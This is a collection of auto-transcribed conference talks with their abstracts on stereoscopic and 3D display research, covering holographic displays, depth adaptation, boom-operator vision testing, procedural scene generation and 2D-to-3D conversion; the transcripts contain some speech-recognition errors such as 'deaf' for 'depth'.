Okay. So we have 12 inch wafers. So any display that is small, that would fit in a 12 inch wafer, we can prototype in about less than a week. Just the, the time it takes to get a, a mask from Topan, which is very fast. And essentially, so we, we prototype and we manufacture the backlight still in Palo Alto and then we have a pilot assembly line in Suzhou that aligns the backlight to the LCD panel. And from that pilot line, we transfer the process to the module assembly house in, in Asia, usually in China. So it's, it's, it's quite heavy operations, but you know, it's, it's hardware, so we have to do it. Another mention is we're able to use the existing 3D ecosystem. You probably heard the previous speaker at Chin on, on, on, on real sense. So we use real sense. I show you how to map facial expression onto 3D avatars, for example. So we were on CNN recently. We can take your facial expression and map them onto a monkey. So it looks like, you know, we're transforming you into a monkey and it's, it's 3D and it's really nice. So we have a unity plugin that lets us take any unity content and, and essentially make it compatible for our platform. So you can play unity games on our platform. We do live motion. We have WebGL. So you can go and have fun online. So most of our demos are rendered in the browser today and it's, it's, it's quick and easy to, to program in JavaScript. So that's an example. I think if you were there last night, some of you might have maybe got to play. So this is like a, this is a CAT scan of, of actually it was a former colleague of mine at HP and turned into a 3D model of his spine. And you get to interact with it with, with a leap motion in real time. You can, you know, you can manipulate the hologram. It's quite fun. This is the demo that I mentioned. This is essentially what you would see, you're basically in front of the display. We have a real sense unit that is capturing your facial expression. And in real time, it is essentially mapping this expression onto this, this 3D hologram of a monkey. So that's quite fun. And I want to leave you with that last image of, you know, the vision again, it's, it's the digital world materialized. And I think so, you know, this is really meant to be the user interface of the future and essentially hope we'll get there soon. So thank you for your attention. Thank you.
|
Ever since Doug Engelbart presented the first modern computer interface with his famous “Mother of All Demos,” we have strived to achieve more intuitive ways to interact with digital information. That interface has not fundamentally changed over the past half-century, though, even as the scope of information continues to exponentially increase. As we now look to computerized AI to help us navigate and make sense of all of our shared data, we also require a new way to present the information that is intuitive and useful to us. Holographic Reality (HR) is based on “holographic” 3D screens that do not require any eyewear to function. These screens must produce realistic, full-parallax 3D imagery that can be manipulated in mid-air by finger or hand gestures. They must provide the same high quality imagery throughout the field of view, no jumps, bad-spots or other visual artefact. Augmented by Haptic technology (tactile feedback), these screens will even let us “feel” the holographic content physically at our fingertips. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32248 (DOI)
|
Hello and welcome. Thanks for attending my presentation about an automated approach for different adaptations of stereoscopic videos. My name is Werner Zellinger and I'm a junior researcher at the software competence center Hagenberg in Austria. This work is developed in cooperation with the Emotion 3D GMBH in particular with Florian Seidner and with the Vienna University of Technology with Mathje Netzwerder and Magrik Gelotz. Our small industrial research companies in the heart of Europe in Austria, 175 kilometers away from Vienna where Vienna University of Technology and our project button Emotion 3D is from. This is a picture. Deaf image-based rendering methods enable the creation of virtual views from color and corresponding deaf images. This enables us to optimize for the best viewing comfort and quality of experience. In this approach, we propose to model the quality of experience maximization as linear optimization problem with the goal of predicting optimal deaf range adaptions. The work is structured as follows. First, I will introduce a 3D quality of experience model from literature. The main part of this presentation will be the introduction of the optimization problem. As intermediate result, I will present a new motion-based comfort zone and some human visual attention data. Finally, some subjective assessment results and statistical results are shown. To do CHEN, a novel model of the quality of experience can conceptually split into three aspects. We shall discomfort, deaf quantity and image quality. The visual discomfort refers to subjective sensation of discomfort someone can experience when watching stereoscopic images or videos. Deaf quantity refers to the perceived amount of deaf and image quality refers to quality aspects like color, noise or artifacts. One challenge of stereoscopic post-production is therefore maximizing the deaf quantity and minimizing visual discomfort where the image quality is not deteriorated. In this approach, we propose to model these three objectives and combine them in order to come up with an overall model for the quality of experience maximization. We propose to model the visual discomfort by the deaf distance between the object of interest and the screen, since if the deaf difference of the most attracting image parts and the screen increases, also the accommodation-virtues-conflict increases, which is known to be a main influencing factor of visual discomfort. We propose to model the deaf quantity simply by the deaf range and the deterioration of the image quality by a complexity measure of the deaf mapping operator. In our case, linear deaf mapping operators simply by the scaling amount. In addition, we propose the following two constraints, a comfort zone that limits the deaf values of a stereoscopic video and a deaf continuity constraint that limits deaf jumps of the objects of interest on short transitions. By using these models, one can implement the following optimization procedure. Their optimization algorithm aims at computing linear deaf mapping operators for shots. We use shots of stereoscopic videos as optimization elements, since they form a natural partition of the stereoscopic video into frames of similar characteristics. At the beginning, we extract some shot features like motion characteristics or saliency features. These features are then used by the comfort zone model and the deaf continuity constraint. In addition, these shot features are also used by our deaf quantity and visual discomfort model. The optimization algorithm then decides which deaf mapping operator corresponds to which stereoscopic shot in order to maximize the quality of experience with subject to our constraints. Now mathematically speaking, the measures for the deaf quantity, visual discomfort and the deterioration of the image quality can be modeled as functions that take a deaf mapping operator and a stereoscopic shot and return the needed value. For example, a model for the deaf quantity takes a linear deaf mapping operator with scaling parameter and shift parameter and returns the deaf range of the stereoscopic shot after the application of the linear deaf mapping operator. By using these functions, we can combine them in order to come up with an overall model for the quality of experience. In addition, we model the comfort zone that consists of a minimum and a maximum limit, limits the deaf value of the frames of the deaf mapped shot. Please note that in contrast to standard comfort zones, we allow more flexibility by taking also shot features into account. The deaf continuity constraint is modeled by a parameter lambda that limits the absolute value of the object of interest in the last frame of shot i and the object of interest in the first frame of shot i plus 1. By using this, we come up with the linear optimization problem. We maximize and search for the deaf mapping operators and sum up the quality of experience models for each of the end shots with subject to the comfort zone and the deaf continuity constraint. Let us consider the constraints in more detail. These comfort zones have been proposed in literature. For example, the deaf of field can be taken as comfort zone, the 3% limit of image width based comfort zone, and the 1 degree of visual angle based comfort zone. However, in our experimental analysis, we observed that when considering high motion shots, stereographers tend to use much smaller deaf ranges than this limit allows. In this figure, this figure shows our experimental analysis of 200 randomly taken shots from five famous 3D movies. It can be seen at the horizontal axis shows the mean length of the optical flow motion vector in the shot. The vertical axis shows the minimum disparity of the shot. It can be seen that for high motion characteristics shots, the stereographers of the five movies use smaller limits than famous limits allow. Of course, this is not unexpected since high motion characteristics are known to influence visual discomfort, but it enables us to define the new motion based comfort zone shown by the black line. Please note that the deaf continuity constraint needs the computation of a human visual attention model. We use the following model. We combine a motion map computed by means of optical flow motion vectors, a disparity map computed by means of the emotion 3D stereoscopic suite for after effects, and a spectral residual saline map of the left image and a center bias. Our experimental analysis is based on subjective assessment rates of 17 subjects. We use 12 videos, five high motion self-captured videos, five high quality videos from the MMSP group, and three Anna Cliff videos from an algorithm published in the International Journal of Computer Vision by Jan in 2013. We ask the subjects for deaf quantity, visual comfort, and image quality. We conducted our setup after ITU recommendation report, and for reference, we put all videos and subjective assessment rates publicly available. This figure shows the results for the algorithm of Jan and our results on the bottom. For the mean opinion scores are shown for visual comfort, image quality, and deaf quantity. It can be seen that the mean level of deaf quantity, image quality, and visual comfort for the videos of Jan is lower than for our videos. This result can be similarly formulated for all 24 videos. We split the set of all subjective assessment for deaf quantity, visual discomfort, and image quality into two sets. One set for the original videos and one set for the mapped videos. We obtained the following result, that the mean level of visual comfort is significantly higher for the mapped videos than for the original videos. The level of image quality and deaf quantity could not be observed for being statistically significantly different. I put references on this slide, including my mail address, and thank you for your attention.
|
Depth-Image Based Rendering (DIBR) techniques enable the creation of virtual views from color and corresponding depth images. In stereoscopic 3D film making, the ability of DIBR to render views at arbitrary viewing positions allows adaption of a 3D scene’s depth budget to address physical depth limitations of the display and to optimize for visual viewing comfort. This rendering of stereoscopic videos requires the determination of optimal depth range adaptions, which typically depends on the scene content, the display system and the viewers’ experience. We show that this configuration problem can be modeled by a linear optimization problem that aims at maximizing the overall quality of experience (QoE) based on depth range adaption. Rules from literature are refined by data analysis and feature extraction based on datasets from film industry and human attention models. We discuss our approach in terms of practical feasibility, generalizability w.r.t different content and subjective image quality, visual discomfort and stereoscopic effects and demonstrate its performance in a user study on publicly available and self-recorded datasets. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32251 (DOI)
|
Dr. Mark Winterbarum is a senior research psychologist supporting the operational-based vision assessment laboratory. His most recent research focuses on U.S. Air Force vision standards and modernizations of vision screening practices. His title of presentation is the Stereoscopic Remote Vision System, Aerial Refueling Visual Performance. Please. Okay. Thank you. Good morning. So I'll be looking at really performance and comfort with the use of stereoscopic area or refueling systems. So hopefully this will be an interesting application that we'll get to hear. You'll get to hear a little bit about this morning. Just a usual disclaimer here before I get started. First just to provide a little bit of context. So I work for the Air Force School of Aerospace Medicine and just provide a little bit of background on our laboratory. I work for the operational-based vision assessment laboratory. So we're really interested in modernizing Air Force vision screening and standards. That is testing the vision of our aircrew, our pilots, and other operators of our aircraft to make sure their vision is good enough for the very complicated tasks that they're doing. And there's kind of a general debate going on right now in a lot of countries. If you establish a particular medical standard, it's now becoming much more important for the organization to say how that is actually related to the task. So being able to say that that is an occupationally relevant medical standard that you're drawing, because that can be sometimes a very contentious issue. And we're, in our case, making sometimes career-ending decisions based on a vision test. We do end a pilot's entire career sometimes just on the basis of a single vision test. So it can be a very big deal. So this is some general capabilities of our laboratory, in addition to what I'm talking about today. The biggest part of our lab is a very high-resolution simulation facility, which you see here in the upper right. So we have a daylight level of luminance, daylight to nighttime, 20-10 level of visual acuity. So we use that laboratory to test our aircrew or other subjects' vision under operational flight simulation conditions. We're also looking at head-mounted display performance and how visual health interacts with the use of those type of devices. We're using virtual reality as well to look at, for example, helicopter landing and whether depth perception is important in those kinds of circumstances. And then today I'll be talking about our aerial refueling work. So the Air Force now is in the process of buying the new KC-46, a new aerial refueling tanker. Several other countries have already are in the process of buying very similar tankers. So we're going from a situation which you see here on the left. So here's a boom operator, and he's, I don't know how well you can see it, but he's got his chin and a chin rest. And he's laid out in the back of, in the tail end of the aircraft, looking out a window to do his refueling task and to fly the boom to do the aerial refueling. So now we're moving to this. This is the Australian KC-30. This is showing their boom-enhanced vision system. So in the upper panel here are a set of 2D displays, which they use to look out behind the aircraft in a wide field of view. And then this is the stereoscopic display. So they're using this window now in place of a direct view window to do the refueling task. And so that's a stereo view of the receiver, aircraft, and the boom. So it's really a much different situation. We've been using this for decades, looking straight out a window. The boom operators now located up in the cockpit with the pilot and co-pilot. So much more comfortable for them, but there's now a lot of technology, cameras, and 3D displays in between them and the receiver aircraft. So quite different. From an aeromedical perspective, we were very concerned that our vision, whether or not our vision standards, our current policies for screening aircrew were really applicable to this new situation. The Air Force does maintain certain minimum standards relevant to depth perception and how well your eyes maintain alignment with each other. But those are World War II era. They certainly predate the use of these kinds of displays and remote vision technology. I won't really talk very much today about what those policies are or the particular tests that we use, but just for example, the depth perception test is really not designed to screen people out. So we have three different stereo acuity tests. They're all very old, TITMIS type circles test. And if you fail the first one, we basically say, okay, try this other one. That one's actually even easier and less discriminating. And if you fail that, we say, okay, try this other test. So the tests are really not designed to filter people out. They're really designed to be pretty inclusive and really only identify very gross deficiencies. So that may not be the best thing to do for this new system. There's also, as I'm sure we're going to hear a lot about this week, reasons to be concerned. There are certainly certain parts of the population that are probably likely to have difficulty using stereoscopic displays and similar technologies. I'm talking more about flat panel stereoscopic displays today, but head mounted displays have similar issues. The Japan Air Self Defense Force, for example, uses a head mounted display in place of the flat panel. They probably will face very similar issues. It's a little bit different technology, but similar issues. We know that there's maybe up to 20% of the population that could very well have difficulties. So from an aeromedical perspective, we are quite concerned about this. There's a lot of reasons why stereo displays could cause some issues for certain people. For this audience, I think you're probably all very familiar with a lot of those issues. I won't talk a lot about those today, but one thing I did want to point out, this is actually a hyper stereoscopic system. So this shows the bottom of a KC-30, and that's the camera bay right there. It's a very big aircraft, so they look kind of small there, but those cameras are pretty widely separated, so it's a hyper stereo viewing condition. So that brings with it some of its own potential complications. So to study this, we built our own simulation in our laboratory. That's what you see here on the right. So similar to the picture I showed earlier, we've got a bank of 2D panoramic displays that looks out behind a simulated aircraft, and then our subjects looking here at this 3D display to do our simulated aerial refueling task. And for our simulation, we're just using a ViewSonic passive polarizing 3D stereo display. These are just standard 2D monitors. We worked very closely with the KC-46 program office, Boeing and Flight Safety. Flight Safety is the supplier for the training system for our new tanker. To head off, I'm sure some questions later, I can't talk very much at all about the exact configuration of the cameras. It's not really an Air Force issue. It's a Boeing intellectual property proprietary issue. But we do think that our simulation was quite representative of the actual system. We actually had some boom operators come in, fly it. They were pretty happy with the simulation, and then it looked quite similar to what they saw with the actual system. So what we're particularly interested in, again, is correlating vision test scores with operationally relevant performance. So in this case, aerial refueling. So again, I'm not going to talk very much about our older standard tests. We pretty much suspected early on that those were probably not worked that well for predicting performance. So we developed our own suite of vision tests, in particular, stereo acuity. This is what our stimulus looks like for the stereo acuity test. This is a threshold level stereo acuity test. So for those subjects with very good stereo acuity, we could actually measure down to single digit arc second level of stereo acuity. So we could pretty accurately assess their level of stereo acuity. We did a fusion range test as well to measure how well they could accommodate, basically cross and uncross their eyes before they would go diplopic or get a double image. Then we also worked with a company called Adaptive Sensory Technology to do a contrast sensitivity test. These are what the stimuli look like for the contrast sensitivity test. So much more accurate than our normal basic SNEL and acuity charts, and again, a threshold level kind of contrast sensitivity test. So those were our three main vision tests that we used to correlate performance. For Experiment 1, we focused really specifically on comparing different viewing methods. So we took, compared the KC46 hypersterioscopic viewing configuration, compared that to a normal stereo, and then also 2D, or just a single camera view. For a decent size group of subjects, but not a really large number. Just to look at what the effect of stereo was. So we do get a very reliable effect of stereo. If we compare normal stereo to 2D, we do get an improvement in our aerial refueling performance. So our subjects, on average, could much more accurately and quickly fly the boom to make contact with the receiver aircraft. Then we got another increase in performance when they switched to that to a hypersterioscopic view. So clearly the addition of stereo or hypersterio is helpful for this task. Really if you were going to pick a task where you might expect stereo to make a difference, this is probably it. You're basically maneuvering two things in depth to make contact with each other. So it is a good candidate for the use of stereo displays. But if we separate our subjects out into two groups, and we just simply separated them on the basis of above average or below average on those set of three tests, contrast sensitivity, stereo acuity, and fusion range. Our subjects that fall into the poor vision group, they either don't benefit from the addition of the stereo, or for hypersterio, they look like they may actually get worse. So we have some initial indication that some people probably do not cope very well with the particular hypersterioscopic configuration we used, or that is going to be used with the KC-46 tanker. So for experiment two, we wanted to look at this a lot more closely. So we took a much larger group of subjects. We're also very interested in how well people do over a long period of time. For the refueling mission, they can be doing that for several hours at a time. So we wanted to look at what the effect of looking at the system was over a two-hour time period. We also wanted to make sure that we were basically replicating what our boom operators have to do. So there we had our subjects alternate pretty frequently between the 2D and the hypersterio 3D display, as they would if they were actually refueling an aircraft. So we did what we call a fighter drag simulation, just repeatedly refueling like a fighter squadron, not like a long mission flying over an ocean, something like that. So we had about 30 subjects. We put them through a pretty comprehensive vision screening that included the three tests that I mentioned earlier. And we had them do the refueling task. We're also very interested in their level of fatigue and discomfort. So we administered a questionnaire about every 10 minutes during that two hours to assess eye fatigue, eye strain, eye tiredness, headache throughout the two-hour time period. So these are the results of the subjective questionnaire. So pretty much everybody was able to finish the task. We didn't get anybody that was so uncomfortable that they just quit and left the experiment. But we did get people like this that just maxed out on the discomfort ratings pretty quickly and a couple of people that complained of dyplopia throughout a significant portion of that two-hour time period. So we did get people that were very uncomfortable doing this task. But by and large, more of our subjects had a profile that looked more like this. So most of our subjects were pretty comfortable doing this task for even as long as two hours. So it was more the case that most people were fairly comfortable. So what we're particularly interested in is the relationship between the vision test and how well they did on this pretty complex task using a 3D display. So these are the correlations between our three vision tests and our aerial refueling performance metric. So for the refueling metric, we're measuring things like how long it took them, how many connections they made throughout that two-hour time period, whether they collided with the aircraft or rammed the boom into our simulated aircraft. We combine that into a single metric. If we correlate the vision scores with that metric, actually all three of these are very strongly related to performance with the stereoscopic remote vision system. Fusion range in particular was also very strongly correlated with ratings of discomfort and eye fatigue. So we've got potentially a set of vision tests here that we can use from an aeromedical perspective to test boom operator candidates before they actually get selected for training. One thing I just wanted to mention briefly, we did get a pretty big effect of age, which is kind of interesting. So we did not really screen people out for any particular reason to do this task. Our boom operators can be older, especially for Air Force National Guard or reserves. They can definitely be well over the age of 40, so we did not screen people out for age. But we did find that for our younger observers, they were much more likely to report higher levels of discomfort and fatigue. So this is the over 30 group. I don't think anybody in that group complained really at all, and that included some people that were well outside the Air Force vision standards. One guy in this group had a very large foyer, but didn't complain. So although there might have been some reasons for them to complain, they were basically fine. So that at least suggests that VA mismatch, Virgins the Combination Mismatch, is one of it's a source of discomfort when using a system like this. So just to wrap up quickly, so a couple of pretty positive findings from our initial result, I think it's safe to say, at least on the air medical side, that there was a lot of skepticism about going from the old direct view system to using all this technology and stereoscopic displays. But we do clearly see, at least in our simulation, that stereo and probably hyperstereo for most people does improve performance. And we mostly found that most of our subjects were quite comfortable doing this, even over a pretty long viewing period. Clearly, we did find a percentage of the population that we tested had a very difficult time using the hyperstereo remote vision system. Their quality of vision, their ocular alignment, their stereo depth clearly makes a difference in being able to perform this task well. For us, that's very important. Flying a boom, doing refueling, that's a very dangerous task. So all the boom operators we talked to pretty much said, oh, no, they never hit the receiver aircraft with the boom. But when we talked to the pilots, a little bit different story. They get pretty irritated if it can take a long time because they're flying on fumes. Sometimes they need to make contact quickly. One pilot actually told us the boom operator jammed the boom right through the canopy of an aircraft and almost impaled the guy inside. So it's a potentially very dangerous task. We want to make sure if we can identify those people ahead of time with a carefully selected set of vision tests that we can. It's also an important training issue. We'd rather not select people, spend hundreds of thousands of dollars on them in training only to have them fail out. So it'd be very cost effective if we can identify people ahead of time that just visually they are not really capable of doing this task for a long period of time. So we are planning to continue this research. Hopefully later this summer we'll kick this off. This is, as I said, potentially career ending kinds of decisions. So we had a pretty good group of subjects, almost 30 people, but we really need a larger group to make specific recommendations on past fail levels of stereo acuity or fusion range to make sure we're really accurately identifying the right people to go on to training or to be kicked out. And I didn't mention earlier that for this simulation we really assumed everything was perfectly set up. So in our simulation the cameras are perfectly aligned, the equal contrast between the camera so very ideal visual conditions. For our next round of research we'd really like to look at degraded visual conditions as well, possibly a little bit of camera misalignment that could just occur during missions or during maintenance issues. And we suspect that people who have less than perfect ocular health may actually have even greater difficulty under those conditions. Okay, so thank you. Thank you.
|
The performance and comfort of aircrew using stereoscopic displays viewed at a near distance over long periods of time is now an important operational factor to consider with the introduction of aerial refueling tankers using remote vision system technology. Due to concern that the current USAF vision standards and test procedures may not be adequate for accurately identifying aircrew medically fit to operate this new technology for long mission durations, we investigated performance with the use of a simulated remote vision system, and the ability of different vision tests to predict performance and reported discomfort. The results showed that the use of stereoscopic cameras generally improved performance but that individuals with poorer vision test scores performed more poorly and reported greater levels of discomfort. In general, newly developed computer-based vision tests were more predictive of both performance and reported discomfort than standard optometric tests. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32253 (DOI)
|
David Gatta, and he's going to be presenting Stereoscopy-based procedural generation of virtual environments. David has received his Master of Science and PhD in Computer Science from the University of Milan. Okay, thank you, Chris, and I love everyone. What I'm presenting today is an application of stereoscopic parameters inside computer graphics. In particular, in a particular field of computer graphics, which is procedural modeling and procedural generation of virtual scenes, you may have seen some examples of procedural generation in the 3D theater last on Monday. And it's something that is more and more used in movies and video games. The generation of a lot of models, trees, buildings in an automatic or semi-automatic way. These scenes are often visualized in 3D. The point is that often, to my knowledge at least, the stereoscopic parameters are not used as a direct parameter to generate the models inside the scene. So what I propose in this paper is to use, to generate a scene using stereoscopy since the beginning of the creation of the scene. We can go back to the comment Neil Dockson has done last Monday, the use of stereoscopy to create something creative, creative tools for creative stereoscopy. And to do that, we needed tools to accurately done to allow the designer of stereoscopic scenes to use all the settings in the scenes in the beginning. Just to give a brief introduction to procedural modeling, the procedural modeling is based on some equations, some set of rules applied to basic shapes. In order to create automatically a complex scene without having to model manually all the features in the scene. For example, very common examples, fractals, used to create some images or fractal terrains. L systems in which using some parameters and a set of rules, you can create complex shapes like trees. And more recently, in more complex systems, the procedural creation of cities. This is a work from 2001, based on the use of some images, giving some information regarding the elevation of the field, the population density, the presence of sea or lakes. You can generate a set of streets and on these streets, you can, using different rules, generate a different kind of buildings and creating something like this. Now in this paper, I try to consider the creation of some of these kind of scenes using stereo parameters to rule the creation of the geometry. The idea is to create a more effective and more pleasant stereoscopic scenes using the stereoscopic parameters since the beginning of the production stages. I present a few simple examples of integration of stereoscopic parameters in a procedural pipeline of a computer graphics production software. The first is very simple, the automatic geometry filling of the stereoscopic camera frustum. And the second one is the automatic detection of window violations and the application of the floating window. We have decided not to develop a system by scratch, but just rather to consider the integration of these techniques inside some already available tool. Opening also the discussion of what is provided by the production tools when we talk about stereoscopy. Now searching there are two sets of production tools, one very specific like the city engine, specific for creation of cities, but they often do not provide stereoscopy. For considering a general purpose tools we more or less go with Udini, which is a full production tool based on procedural generation. It provides stereoscopy, but the problem is that not all the parameters of the stereoscopic setup are provided as a tool inside the node based generation of the scenes. So you can set the stereoscopy camera, you can produce the stereoscopy image, but you cannot use the parameters of the stereoscopy setup in the production of the scene. So we have opted for a different approach. We have considered the blender, which is open source, it provides stereoscopy pipeline, it is not a procedural tool, but by use of this ad on as a version from a Russian developer it is possible to extend the node editor blender that is already present for creating material for compositor to use it as a Udini to create a geometry. In this case we have the maximum flexibility, we have all the source code of the blender, we can do whatever we want, we can check every step of operation done inside the blender. Obviously this is particularly true for Zvarchuk, Zvarchuk is heavily in development stages, so you may lose stability when the development goes on and new versions are available. But just to break the highs of the topic and to do some preliminary test we found it a better solution. Test scene, we have decided to build a very simple scene, not as complex as in the previous work, both because we didn't have enough computational power, we are talking about hundreds of thousands of triangles in the scene. So we have, now it's quite dark actually, but we have decided for a very simple rendering level because the techniques that we are proposing are independent of how much you push the rendering, you can do it in tune shading, photorealistic rendering, we are discussing about the creation of the geometry, so at the moment we have decided to stay with an acceptable range of rendering. These techniques can also be integrated with other kind of scenes, trees instead of buildings, particle systems, they don't matter, we are talking about the stereoscopic parameters and now we can use it. So I will not go into the details of the construction of the geometry because it's not the topic of the paper. But simply we start with a patch, we divide it with some scheme, some parameters, in this case some sort of diamond based shape to build the streets and lots, and then for each lot we calculated the height of the buildings, mainly randomly, but there are some parameters that the user can set. And with many blocks you can create a city, you can also select some blocks to be some sort of downtown with the scalper, with other, it's going down with Gavishan way, but again no more details. Let's go to the stereoscopic setup. First one is almost trivial, I was sure to find someone else I've considered it but I've not found people in it, maybe the production tools used in the production companies that are not publicly available, they maybe used this since years but nobody has discussed it about it. It's trivial, if I have to create a 3D computer graphics I have to decide the 3D position of an object in a scene. So let's use what is called in computer graphics camera space, let's create, let's decide the position using the cameras, the origin of the world, and let's decide the depth, the Z position of the objects considering the stereoscopic frustum. In order to have control of the final depth range of the scene, having the control of the final parallax on the screen, and using only one parameter you can also re-edit the scene in case the material must be edited or converted for other setups or other possible solutions. So the idea is to introduce a rule like this, to decide the depth, the Z coordinate of the geometry inside the stereoscopic frustum, limiting in a set where the minimum Z can be the near plane of the camera or some other value decided by the user, and the maximum is given by this, where this one is the distance from the camera to the maximum parallax plane. I can calculate it because it's based on the forward camera, the convergence, the distance of the convergence plane, the size of the sensor, so you can go to the magnification factor, the size of the final image on the screen, all these parameters are known in a computer graphics setup. So I can calculate what will be the maximum parallax on screen and where is the maximum distance leading to the maximum parallax plane. And with these simple parameters ranging from 0 to 1, I can feel it. So from top you see I've stopped at 0.5, you can see as a percentage 50%, 80%, 95%. It's quite simple and straightforward. But here before showing you some example, the problems. Blender but also the other tools providing stereoscopic software, they give you the tools, they let you set the interaction distance, they let you set the convergence plane, they provide you a visualization of the stereoscopic frustum of the planes in order to manually place the objects inside the frustum, but they don't give you back the values. There are no panels on the graphic interface telling you, okay, the maximum parallax plane is that far. If it's equal to the far plane of the camera, okay, you're lucky. But otherwise you have no way to know where it is, nor in the API if you want to develop a script, it's provided. So it's calculated inside the software, but they are not provided from the user. So you cannot use it since the beginning. So in this case, rather than modifying the whole code of Blender, that is something that can be done when it's needed because you have also to contact the developer of Blender and there is some policy, we have to develop a Python script to recalculate the position of the maximum parallax plane in order to have it available to use it in the generation. So we have to do something that is radical quality inside Blender, but it's not provided from the software. In Dantes, you can use it and you can apply the value in your generation script to create the geometry. So the problem is the production software do not provide a full consideration of the stereoscopic setup in all the stages of the production. It is something that we may discuss. So some, we have to switch to 3D, that's the song. They are just free, yeah, thank you. They are just free image, but then I have some other results in the hand. Okay, maybe we may have to switch the lights off, I'm sorry. This is our scene with SFF parameter of 0.5. Now if you see on the background now, now 0.80, and 0.95, so almost filling the volume. So with just one parameter, I can control the automatic creation of this. In this scene, we have 2700s of buildings and something like 170,000 of triangles. So all created procedurally. And the depth range controls about this parameter. There are some window violations, I don't know if they are noticeable, but we will address it in the second technique. So we can go back to the 2D, keep your glasses on, keep your glasses near to you because we have other results in the hand. Okay, so this was very simple. Second one, bit more sophisticated. We have created the scene procedurally. And this scene, it may happen that we have window violations because some objects may be placed in negative retinal areas. So the idea was to detect automatically these violations and to automatically place the lateral mask of the floating window technique as actual 3D objects inside this scene, including the geometry producing the violations. This technique has four steps. You already know how it works, the floating window principle. If we have an object in a retinal rivalry, negative retinal rivalry, we think to have the window tilted like this in order to introduce a mask in the final scene. Really the most common way to do it in post-processing, applying the lateral mask on the final image. We are considering to apply it in 3D. Again our approach is based on some operation, Boolean operation between the geometry of the scene and the frustum of the camera, stereo camera. Again same problem as before. The frustum of the camera, the stereo camera is shown as a visual head, but there is no way to assess it as an actual 3D model to use in the scene. So we add again to implement a Python script in Blender to recalculate the values of the vertices of the planes building the camera frustum, to use these vertices to create an actual 3D model to add in the graph of the scene. In order to use it for our purposes. Again all these calculations is already done in Blender but is not provided to you if not like a visualization of where to place objects in order to have an idea of what will be the final depth. It is not very complicated because we know the fob, we know where is the distance of the converters plane. We have calculated where is the maximum parallax plane so it is just some trigonometry and something more just to find the vertices. Having done this we can calculate, we can have actual models in this case considering that we are doing a detection of window violations. We are interested in these two solids, the two negative parallax frustums that are represented here. Let's go fast, top view, you do it in the both sides, you have the model, you do a Boolean operation between the model and the solid of the retinal negative frustum. You detect this one and in particular we need this point because we have to place the mask here and this vertex does not exist. So now you have the point, you find it simply doing a depth rendering pass in order to have a depth image, depth buffer, you search for the minimum one. It is trivial if you have a triangle, it is not trivial if you have thousands and thousands of triangles. Once you have this, you create an actual plane, a black plane in the scene, it is like all the field, in the beginning you can create as large as you want and then you do another Boolean intersection between the frustum and the plane and what you have is a patch in 3D placed in front of the geometry that occludes the geometry behind. This is a visualization in 3D of what is the result. And maybe I will switch to the final video and not to the image. I was sorry, I am running very late. Not sure I will provoke the same enthusiastic reaction of the audience shown there. The idea was this is the image of 0.95 without and with maybe with I don't know if it's with the lights that the floating window is not so dark. Again another view and again with the floating window automatically applied and finally this is a 20 seconds movie of our scene created with the floating window procedurally generated in each frame at the correct size. So to again more than 3,000 of buildings and 170 triangles created procedurally. Obviously you can create everything you want maybe apply the same techniques. Very final remarks, the techniques are promising you can do whatever you want so you have the tools. If you have the tools since the beginning you can do whatever you want. If you don't have a better integration of stereoscopy inside the production pipeline you will be limited. In case of the open source tool you can apply the modification or you can communicate with the community developing the tools. In case of a proprietary production tools there is the need of some discussion and collaboration with the developers. Thank you for your attention just finishing the joke.
|
Procedural generation of virtual scenes (like e.g., complex cities with buildings of different sizes and heights) is widely used in the CG movies and videogames industry. Even if this kind of scenes are often visualized using stereoscopy, however, to our knowledge, stereoscopy is not currently used as a tool in the procedural generation, while a more comprehensive integration of stereoscopic parameters can play a relevant role in the automatic creation and placement of virtual models. In this paper, we show how to use stereoscopic parameters to guide the procedural generation of a scene in an open-source modeling software. Virtual objects can be automatically placed inside the stereoscopic volume, in order to reach the maximum amount of parallax on screen, given a particular interocular distance, convergence plane and display size. The proposed approach allows to create again a virtual scene, given a particular context of visualization, avoiding problems related to excessive positive parallax in the final rendering. Moreover, the proposed approach can be used also to automatically detect window violations, by determining overlaps in negative parallax area between models and the view frustums of the stereoscopic camera, and to apply proper solutions, like e.g. the automatic placement of a floating window. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32254 (DOI)
|
Margaret Gerout, she is an associate professor at Vienna University of Technology, Australia. She directs a research group on image and video analysis and synces with focus on 3D film, TV applications. Her presentation is towards perceptionally coherent depth maps in 2D to 3D conversion. So please. Thank you very much. Good morning, everybody. So as I already mentioned, the title of this presentation is Towards Perceptionally Coherent Depth Maps in 2D to 3D Conversion and it's joint work by Nicole Broche, Tanya Schausberger, myself, I'm Margaret Gelotz and we are affiliated with the Institute of Software Technology and Interactive Systems at Vienna University of Technology in Austria. So what am I going to talk about today? I'll first give a brief introduction. I'll say some words about the principles of semi-automatic 2D to 3D conversion and then I'll focus on the algorithm we have developed. So I'll first give an overview of the whole processing chain and then I'll focus in more detail on some of its specific components, some constraints we introduced and one particular issue we are dealing with is to the proper treatment of objects that exhibit motion in depth. I'll then present an experimental evaluation of the algorithm we designed. I'll show the effects of different versions of the algorithm and I'll also present a comparison to other competing algorithms. So just a few words. Why do we need 2D to 3D conversion nowadays? There's a broad range of 3D capturing devices already available but of course if we are dealing with available 2D archives and we want to convert them to 3D then those 2D to 3D conversion techniques come into the play. There are several techniques, several ways to do that and one of them is what we are actually using is an interactive semi-automatic approach. So in our algorithm we have some user provided scribbles on the first and on the last frame and these past depth values are then propagated throughout the whole video volume so that we finally get depth maps for every frame throughout the whole sequence. And some of the challenges we encounter in such algorithms is the topics of coherence. So we want to achieve spatial temporal coherence that means that the edges in the computed depth map, depth video should be aligned with the edges in the input video and also we want to achieve perceptual coherence which means in particular that our result should be, our depth result should be consistent with monocular depth cues and in particular we are taking a look at occlusions that were caused by object motion. So here is an example of what I mean by perceptual coherence. Let's take a look at this section of a video. So we have the small dragon in the background that's coming closer. There's another dragon in the foreground, actually the big one here and at some point in time the small dragon comes further in the foreground so it's actually occluding the bigger object, the bigger dragon in the background. So it moves on. And what happens now in conventional 2D to 3D conversion, let's assume we have several frames of the input video, first frame, the last frame and an intermediate frame and the user is drawing some hopefully comfortable scribbles on the first frame so the depth encoding is given here. So blueish colors of the scribbles, they mean the object is in front and the yellow and the reddish colors they denote objects that are further in the back. And in particular if you take a look at the small dragon here it's annotated in yellow so it's rather far in the back and on the last frame here it's annotated in blue that means that it has come in the meantime, it has come further to the front. Thank you. So what 